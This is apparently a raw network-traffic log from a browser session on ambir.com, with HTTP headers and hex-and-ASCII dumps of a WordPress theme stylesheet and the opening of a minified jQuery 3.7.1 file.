                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Mon, 04 Mar 2024 16:19:48 GMT
                                                                                                                                                                                              ETag: W/"65e5f4a4-5541"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 2512
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f7dc90441d2-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:17 UTC893INData Raw: 35 35 34 31 0d 0a 2f 2a 0a 54 68 65 6d 65 20 4e 61 6d 65 3a 20 41 6d 62 69 72 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 0a 41 75 74 68 6f 72 3a 20 41 6e 64 72 65 73 20 4a 2e 20 56 69 6c 6c 61 72 0a 41 75 74 68 6f 72 20 55 52 49 3a 20 68 74 74 70 73 3a 2f 2f 6d 65 72 69 74 64 65 73 69 67 6e 73 2e 63 6f 6d 0a 44 65 73 63 72 69 70 74 69 6f 6e 3a 20 54 68 65 6d 65 20 57 6f 72 64 70 72 65 73 73 0a 56 65 72 73 69 6f 6e 3a 20 32 2e 30 20 0a 2a 2f 0a 3a 72 6f 6f 74 20 7b 09 0a 09 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 0a 09 2d 2d 6f 72 61 6e 67 65 3a 20 23 63 63 36 36 30 30 3b 0a 09 2d 2d 68 6f 76 65 72 3a 20 23 62 38 35 63 30 30 3b 0a 09 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 0a 09 2d 2d 70 72 69 6d 61 72 79 3a 20 23 33 33 33 3b 0a 7d 0a 68
                                                                                                                                                                                              Data Ascii: 5541/*Theme Name: Ambir TechnologiesAuthor: Andres J. VillarAuthor URI: https://meritdesigns.comDescription: Theme WordpressVersion: 2.0 */:root {--white: #ffffff;--orange: #cc6600;--hover: #b85c00;--black: #000000;--primary: #333;}h
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 6c 2d 35 30 2c 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 2d 33 33 2c 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 2d 31 30 30 2c 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 2d 36 36 20 7b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 35 70 78 3b 0a 7d 0a 2e 63 6c 65 61 72 2c 20 2e 63 6c 65 61 72 66 69 78 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 7d 0a 2e 68 65 69 67 68 74 35 20 7b 0a 09 68 65 69 67 68 74 3a 20 35 70 78 3b 0a 7d 0a 2e 68 65 69 67 68 74 31 30 20 7b 0a 09 68 65 69 67 68 74 3a 20 31 30 70 78 3b 0a 7d 0a 2e 68 65 69 67 68 74 31 35 20 7b 0a 09 68 65 69 67 68 74 3a 20 31 35 70 78 3b 0a 7d 0a 2e 68 65 69 67 68 74 32
                                                                                                                                                                                              Data Ascii: l-50, .elementor-col-33, .elementor-col-100, .elementor-col-66 {padding-left: 15px;padding-right:15px;}.clear, .clearfix {display: block;clear: both;}.height5 {height: 5px;}.height10 {height: 10px;}.height15 {height: 15px;}.height2
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 73 65 72 69 66 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 09 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 6f 72 61 6e 67 65 29 3b 0a 7d 0a 68 31 2c 20 2e 68 31 20 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 70 78 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 36 36 70 78 3b 0a 7d 0a 68 32 2c 20 2e 68 32 20 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 32 70 78 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 35 36 70 78 3b 0a 7d 0a 0a 0a 2f 2a 20 4d 65 6e 75 20 2a 2f 0a 68 65 61 64 65 72 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 09 7a 2d 69 6e 64 65 78 3a 20 31 30 30 3b 0a 09 74 6f 70 3a 20 30 3b 0a 09 6c 65 66 74 3a 20 30 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66
                                                                                                                                                                                              Data Ascii: serif;font-weight: 300;color: var(--orange);}h1, .h1 {font-size: 50px;line-height: 66px;}h2, .h2 {font-size: 42px;line-height: 56px;}/* Menu */header {position: fixed;z-index: 100;top: 0;left: 0;width: 100%;background: #ff
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 76 61 72 28 2d 2d 6f 72 61 6e 67 65 29 3b 0a 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 30 20 30 20 31 70 78 20 30 3b 0a 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 65 30 65 30 65 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 35 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 7d 0a 23 71 75 61 64 6d 65 6e 75 20 2e 71 75 61 64 6d 65 6e 75 2d 6e 61 76 62 61 72 2d 6e 61 76 20 6c 69 2e 71 75 61 64 6d 65 6e 75 2d 69 74 65 6d 20 2e 71 75 61 64 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 20 7b 0a 20
                                                                                                                                                                                              Data Ascii: var(--orange); border-width: 0 0 1px 0; border-style: solid; border-color: #e0e0e0; margin-bottom: 5px; font-weight: normal; padding-bottom: 10px; margin-top: 10px;}#quadmenu .quadmenu-navbar-nav li.quadmenu-item .quadmenu-item-content {
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 66 66 66 3b 0a 20 20 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 0a 20 20 77 69 64 74 68 3a 20 32 38 70 78 3b 0a 7d 0a 2e 73 65 61 72 63 68 74 6f 70 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 7d 0a 2e 73 65 61 72 63 68 74 6f 70 20 69 6e 70 75 74 20 7b 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 68 65 69 67 68 74 3a 20 34 34 70 78 3b 0a 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 38 30 70 78 20 31 30 70 78 20 31 35 70 78 3b 0a 7d 0a 2e 73 65 61 72 63 68 74 6f 70 20 62 75 74 74 6f 6e 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 6f 72 61 6e 67 65 29 3b 0a 09 68 65 69 67 68 74 3a 20 34 34 70 78 3b 0a 09 62 6f 72 64 65 72 3a 20 6e 6f
                                                                                                                                                                                              Data Ascii: fff; outline: none; width: 28px;}.searchtop {position: relative;}.searchtop input {width: 100%;height: 44px;border: 1px solid #ddd;padding: 10px 80px 10px 15px;}.searchtop button {background: var(--orange);height: 44px;border: no
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 74 6f 70 3a 20 2d 32 70 78 3b 0a 7d 0a 2e 73 6c 69 64 65 72 20 2e 6f 77 6c 2d 64 6f 74 73 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 6c 65 66 74 3a 20 30 3b 0a 09 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 73 6c 69 64 65 72 20 2e 6f 77 6c 2d 64 6f 74 20 7b 0a 20 20 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 09 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 09 68 65 69 67 68 74 3a 20 36 70 78 3b 0a 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 3b
                                                                                                                                                                                              Data Ascii: n: relative;top: -2px;}.slider .owl-dots {display: block;position: absolute;left: 0;bottom: 30px;width: 100%;text-align: center;}.slider .owl-dot { display: inline-block; width: 30px; height: 6px; background: #fff !important;
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 64 69 6e 67 3a 20 31 30 70 78 20 31 32 70 78 3b 0a 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 30 65 30 65 30 3b 0a 7d 0a 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 69 74 65 6d 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 7d 0a 2e 69 74 65 6d 2d 62 6c 6f 67 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 7d 0a 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 69 74 65 6d 20 2e 74 61 67 73 2c 20 2e 69 74 65 6d 2d 62 6c 6f 67 20 2e 74 61 67 73 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 6c 65 66 74 3a 20 30 3b 0a 09 74 6f 70 3a 20 30 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 35 70 78 3b 0a 09
                                                                                                                                                                                              Data Ascii: ding: 10px 12px;border-bottom: 1px solid #e0e0e0;}.owl-carousel .item {position: relative;}.item-blog {position: relative;}.owl-carousel .item .tags, .item-blog .tags {position: absolute;left: 0;top: 0;width: 100%;padding-top: 5px;
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 72 2d 62 75 74 74 6f 6e 2d 6e 65 78 74 2c 20 0a 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 20 7e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 2d 6e 65 78 74 2c 20 0a 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 2e 73 77 69 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 2d 6e 65 78 74 2c 20 0a 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 2e 73 77 69 70 65 72 20 7e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 2d 6e 65 78 74 2c 20 0a 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6c 69 67 68 74 62 6f 78 20 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72
                                                                                                                                                                                              Data Ascii: r-button-next, .elementor-element .swiper-container ~ .elementor-swiper-button-next, .elementor-element .swiper .elementor-swiper-button-next, .elementor-element .swiper ~ .elementor-swiper-button-next, .elementor-lightbox .swiper-container .elementor
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 36 38 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 32 70 78 3b 0a 7d 0a 2e 6c 61 74 65 73 74 70 6f 73 74 2d 69 6d 61 67 65 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 77 69 64 74 68 3a 20 35 34 70 78 3b 0a 09 68 65 69 67 68 74 3a 20 35 34 70 78 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 6c 65 66 74 3a 20 30 3b 0a 09 74 6f 70 3a 20 32 70 78 3b 0a 7d 0a 2e 73 6f 63 69 61 6c 66 6f 6f 74 65 72 20 61 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 77 69 64 74 68 3a 20 33 36 70 78 3b 0a 09 68 65 69 67 68 74 3a 20 33 36 70 78 3b 0a 09 6d 61 72 67 69 6e 2d
                                                                                                                                                                                              Data Ascii: position: relative;padding-left: 68px;margin-bottom: 12px;}.latestpost-image {display: block;width: 54px;height: 54px;position: absolute;left: 0;top: 2px;}.socialfooter a {display: inline-block;width: 36px;height: 36px;margin-
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 0a 7d 0a 2e 74 65 72 6d 69 6e 6f 73 20 68 33 20 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 7d 0a 2e 74 65 72 6d 69 6e 6f 73 20 68 72 20 7b 0a 09 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 34 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 2e 68 65 61 64 65 72 2d 6e 6f 73 6f 74 72 6f 73 20 7b 0a 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 25 3b 0a 09 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 25 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 31 31 20 21 69 6d 70 6f 72 74
                                                                                                                                                                                              Data Ascii: }.terminos h3 {font-size: 20px;color: #666;}.terminos hr {border-top: 1px solid #ccc; margin-bottom: 40px !important;}.header-nosotros {padding-top: 60px;padding-bottom: 60px;padding-left: 15%;padding-right: 15%;color: #111 !import


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              12192.168.2.549726141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:16 UTC602OUTGET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-7ba40e52.min.js HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:17 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:17 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 18:27:07 GMT
                                                                                                                                                                                              ETag: W/"673e29fb-18b11"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 6835
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f7fcea9421c-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:17 UTC878INData Raw: 37 64 63 35 0d 0a 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72
                                                                                                                                                                                              Data Ascii: 7dc5/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Err
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 69 66 28 6f 2e 74 65 78 74 3d 65 2c 74 29 66 6f 72 28 72 20 69 6e 20 75 29 28 69 3d 74 5b 72 5d 7c 7c 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 26 26 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 72 29 29 26 26 6f 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 72 2c 69 29 3b 6e 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 65 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 3f 6e 5b 69 2e 63 61 6c 6c 28 65 29 5d 7c 7c 22 6f 62 6a 65 63 74 22 3a 74 79 70 65 6f 66 20 65 7d 76 61 72 20 74 3d 22 33 2e 37
                                                                                                                                                                                              Data Ascii: if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[i.call(e)]||"object":typeof e}var t="3.7
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 75 73 68 3a 73 2c 73 6f 72 74 3a 6f 65 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 6f 65 2e 73 70 6c 69 63 65 7d 2c 63 65 2e 65 78 74 65 6e 64 3d 63 65 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 73 3d 31 2c 75 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6c 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 61 26 26 28 6c 3d 61 2c 61 3d 61 72 67 75 6d 65 6e 74 73 5b 73 5d 7c 7c 7b 7d 2c 73 2b 2b 29 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 76 28 61 29 7c 7c 28 61 3d 7b 7d 29 2c 73 3d 3d 3d 75 26 26 28 61 3d 74 68 69 73 2c 73 2d 2d 29 3b 73 3c 75 3b 73 2b 2b 29 69 66 28 6e 75 6c
                                                                                                                                                                                              Data Ascii: ush:s,sort:oe.sort,splice:oe.splice},ce.extend=ce.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||v(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(nul
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 73 65 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 69 73 58 4d 4c 44 6f 63 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 72 65 74 75 72 6e 21 6c 2e 74 65 73 74 28 74 7c 7c 6e 26 26 6e 2e 6e 6f 64 65 4e 61 6d 65 7c 7c 22 48 54 4d 4c 22 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 74 2e 6c 65 6e 67 74 68 2c 72 3d 30 2c 69 3d 65 2e 6c 65 6e 67 74 68 3b 72 3c 6e 3b 72 2b 2b 29 65 5b 69 2b 2b 5d 3d 74 5b 72 5d 3b 72 65 74 75
                                                                                                                                                                                              Data Ascii: nction(e,t,n){return null==t?-1:se.call(t,e,n)},isXMLDoc:function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument||e).documentElement;return!l.test(t||n&&n.nodeName||"HTML")},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];retu
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 57 28 29 2c 63 3d 57 28 29 2c 75 3d 57 28 29 2c 68 3d 57 28 29 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 74 26 26 28 61 3d 21 30 29 2c 30 7d 2c 66 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 74 3d 22 28 3f 3a 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 67 65 2b 22 3f 7c 5c 5c 5c 5c 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 7c 5b 5c 5c 77 2d 5d 7c 5b 5e 5c 30 2d 5c 5c 78
                                                                                                                                                                                              Data Ascii: W(),c=W(),u=W(),h=W(),l=function(e,t){return e===t&&(a=!0),0},f="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",t="(?:\\\\[\\da-fA-F]{1,6}"+ge+"?|\\\\[^\\r\\n\\f]|[\\w-]|[^\0-\\x
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 4d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 56 28 29 7d 2c 52 3d 4a 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 66 65 28 65 2c 22 66 69 65 6c 64 73 65 74 22 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22 7d 29 3b 74 72 79 7b 6b 2e 61 70 70 6c 79 28 6f 65 3d 61 65 2e 63 61 6c 6c 28 79 65 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 79 65 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 6f 65 5b 79 65 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 5d 2e 6e 6f 64 65
                                                                                                                                                                                              Data Ascii: arCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},M=function(){V()},R=J(function(e){return!0===e.disabled&&fe(e,"fieldset")},{dir:"parentNode",next:"legend"});try{k.apply(oe=ae.call(ye.childNodes),ye.childNodes),oe[ye.childNodes.length].node
                                                                                                                                                                                              2024-11-20 20:28:17 UTC1369INData Raw: 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 24 28 65 29 7b 76 61 72 20 74 3d 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 29 2c 74 3d 6e 75 6c 6c 7d 7d 66 75 6e 63 74 69 6f 6e 20 42 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 65 28 65 2c 22 69 6e 70
                                                                                                                                                                                              Data Ascii: &&delete e[r.shift()],e[t+" "]=n}}function F(e){return e[S]=!0,e}function $(e){var t=T.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function B(t){return function(e){return fe(e,"inp
